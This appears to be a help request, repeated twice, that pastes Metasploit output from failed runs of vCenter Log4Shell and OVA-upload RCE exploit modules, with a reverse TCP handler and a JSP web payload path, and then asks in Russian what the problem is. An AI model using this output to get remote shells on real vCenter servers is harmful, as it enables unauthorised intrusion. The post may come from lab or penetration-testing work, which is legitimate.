vmware_vcenter_log4shell
[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
vmware_vcenter_uploadova_rce
[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
[+] 10.10.10.11:443 - Identified VMware vCenter Server 6.7.0 build-15505678
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable. Unauthenticated endpoint access granted.
[*] Uploading OVA file: IB05ZgoURbgDjMEHpfdLP57gbkFxoHlIc3gSn.ova
[+] Successfully uploaded OVA file
[*] Requesting JSP payload: https://10.10.10.11/ui/resources/wTxmBddpCt2cDFPm8Eo.jsp
[-] Exploit aborted due to failure: payload-failed: Failed to request JSP payload
[!] This exploit may require manual cleanup of '/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/wTxmBddpCt2cDFPm8Eo.jsp' on the target
[!] This exploit may require manual cleanup of '/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/wTxmBddpCt2cDFPm8Eo.jsp' on the target
[*] Exploit completed, but no session was created.
В чем проблема?
[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
vmware_vcenter_uploadova_rce
[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
[+] 10.10.10.11:443 - Identified VMware vCenter Server 6.7.0 build-15505678
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable. Unauthenticated endpoint access granted.
[*] Uploading OVA file: IB05ZgoURbgDjMEHpfdLP57gbkFxoHlIc3gSn.ova
[+] Successfully uploaded OVA file
[*] Requesting JSP payload: https://10.10.10.11/ui/resources/wTxmBddpCt2cDFPm8Eo.jsp
[-] Exploit aborted due to failure: payload-failed: Failed to request JSP payload
[!] This exploit may require manual cleanup of '/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/wTxmBddpCt2cDFPm8Eo.jsp' on the target
[!] This exploit may require manual cleanup of '/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/wTxmBddpCt2cDFPm8Eo.jsp' on the target
[*] Exploit completed, but no session was created.
В чем проблема?
